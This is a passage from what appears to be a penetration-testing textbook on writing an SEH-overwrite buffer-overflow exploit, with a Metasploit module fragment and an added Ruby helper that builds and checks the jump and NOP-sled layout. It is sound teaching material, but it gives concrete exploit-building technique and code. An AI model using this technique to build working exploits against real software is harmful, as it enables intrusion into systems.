Creating Your Own Exploits
When editing your exploit, be sure to adjust the initial buffer length as you make changes, or your alignment will be off. In this case, NSEH is being overwritten with the instructions for a short jump backward (\xeb\xf9\x90\x90). Here eb is the opcode for a short jump and f9 is its signed 8-bit displacement, -7, counted from the end of the two-byte instruction, so execution lands five bytes before the jump itself; the two \x90 bytes are padding that fill out the four-byte NSEH slot. The new lead buffer length is adjusted to 10,356 bytes, because the five new bytes that the jump lands on come before the SEH overwrite.
When you run the exploit again and step through the instructions in the debugger, you should land in the 41s (hexadecimal As) just before the exception handler values. Because 0x41 disassembles as INC ECX, you will see five INC ECX instructions there; those five bytes are what you replace with the code that jumps farther back into the initial buffer.
Now we’ll change the exploit to include the near jump (\xe9\xdd\xd7\xff\xff), which jumps backward to a location near the beginning of the buffer. Here e9 is the opcode for a near jump and the remaining four bytes are its little-endian 32-bit displacement, 0xffffd7dd or -10,275, again counted from the end of the five-byte instruction. Looking at the buffer (Figure 14-6), you can see that the entire string of As is completely intact, leaving more than 10,000 bytes available for shellcode. Since functional shellcode typically needs less than 500 bytes, this leaves you ample room.
Figure 14-6: Lots of room for shellcode
Now all you have to do is replace the buffer of 41s with NOPs (\x90) to give yourself a nice NOP slide to land in, and then you can sit back and let Metasploit take care of the shellcode. Note that the lead is now 10,351 bytes minus the length of the encoded payload: the five-byte near jump occupies the last five bytes of the 10,356-byte region in front of NSEH, so NSEH still lands at the same offset as before.

    def exploit
      connected = connect_login
      # NOP sled sized so that sled + encoded payload fills exactly 10,351 bytes
      lead = "\x90" * (10351 - payload.encoded.length)
      # near jump (E9 rel32) back toward the start of the NOP sled
      near = "\xe9\xdd\xd7\xff\xff"
      # NSEH: short jump (EB rel8) five bytes back, onto the near jump; \x90\x90 pads the slot
      nseh = "\xeb\xf9\x90\x90"
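The two jump encodings above are the part of this layout that breaks silently when a buffer length changes. The following is an added example, not code from the book or from its exploit module: it encodes and decodes EB rel8 and E9 rel32 jumps from buffer offsets, rebuilds the lead + payload + near + NSEH + SEH layout the page describes, and checks that each jump lands where it should. The NSEH offset of 10,356, the landing offset of 81 inside the NOP sled, the constructed 300-byte INT3 payload, and the SEH address 0x41424344 are assumptions for illustration only.

```ruby
# Added example (not the book's module): x86 relative-jump encoding and a
# layout check for the SEH overwrite buffer described on this page.
# Assumed layout: lead NOPs + payload + near jmp (5) + NSEH (4) + SEH (4),
# with NSEH at offset 10,356 (an assumption taken from the text).
NSEH_OFFSET = 10_356
NEAR_OFFSET = NSEH_OFFSET - 5   # 10_351: the near jump sits just before NSEH

# EB rel8: the displacement is relative to the END of the 2-byte instruction,
# so "\xeb\xf9" (rel8 = -7) lands five bytes before the jump itself.
def short_jmp(target_off, instr_off)
  rel = target_off - (instr_off + 2)
  raise ArgumentError, "rel8 out of range: #{rel}" unless (-128..127).cover?(rel)
  [0xeb, rel].pack("Cc")
end

# E9 rel32: the displacement is relative to the END of the 5-byte instruction.
def near_jmp(target_off, instr_off)
  rel = target_off - (instr_off + 5)
  [0xe9, rel].pack("Cl<")
end

# Decode: given the raw bytes of a jmp located at instr_off, return where it lands.
def jmp_target(bytes, instr_off)
  case bytes.getbyte(0)
  when 0xeb then instr_off + 2 + bytes.byteslice(1, 1).unpack1("c")
  when 0xe9 then instr_off + 5 + bytes.byteslice(1, 4).unpack1("l<")
  else raise ArgumentError, "not a relative jmp: %02x" % bytes.getbyte(0)
  end
end

# Build the buffer. seh_addr is a hypothetical handler address; land_off is the
# offset inside the NOP sled that the near jump should land on.
def build_buffer(payload, seh_addr, land_off)
  lead_len = NEAR_OFFSET - payload.bytesize
  raise ArgumentError, "payload too big by #{-lead_len} bytes" if lead_len < 0
  unless (0...lead_len).cover?(land_off)
    raise ArgumentError, "landing offset #{land_off} is not inside the NOP sled"
  end
  lead = "\x90".b * lead_len
  near = near_jmp(land_off, NEAR_OFFSET)
  nseh = short_jmp(NEAR_OFFSET, NSEH_OFFSET) + "\x90\x90".b   # pad NSEH to 4 bytes
  seh  = [seh_addr].pack("V")
  lead + payload.b + near + nseh + seh
end

# Sanity check of a built buffer: NSEH's short jump must land on the near jump,
# and the near jump must land inside the NOP sled (not in the payload or past it).
def check_layout(buf, payload_len)
  lead_len  = NEAR_OFFSET - payload_len
  nseh_land = jmp_target(buf.byteslice(NSEH_OFFSET, 2), NSEH_OFFSET)
  near_land = jmp_target(buf.byteslice(NEAR_OFFSET, 5), NEAR_OFFSET)
  {
    nseh_lands_on_near: nseh_land == NEAR_OFFSET,
    near_lands_in_sled: (0...lead_len).cover?(near_land),
    near_land: near_land,
    total_len: buf.bytesize,
  }
end

if __FILE__ == $PROGRAM_NAME
  payload = "\xcc".b * 300                       # constructed stand-in for payload.encoded
  buf = build_buffer(payload, 0x41424344, 81)    # hypothetical SEH address
  p check_layout(buf, payload.bytesize)
end
```

Rerunning build_buffer and check_layout after every change to the lead length is the mechanical version of the page's warning about alignment: if the payload grows, the sled shrinks, and the check reports whether the near jump still lands in NOPs before you ever attach a debugger.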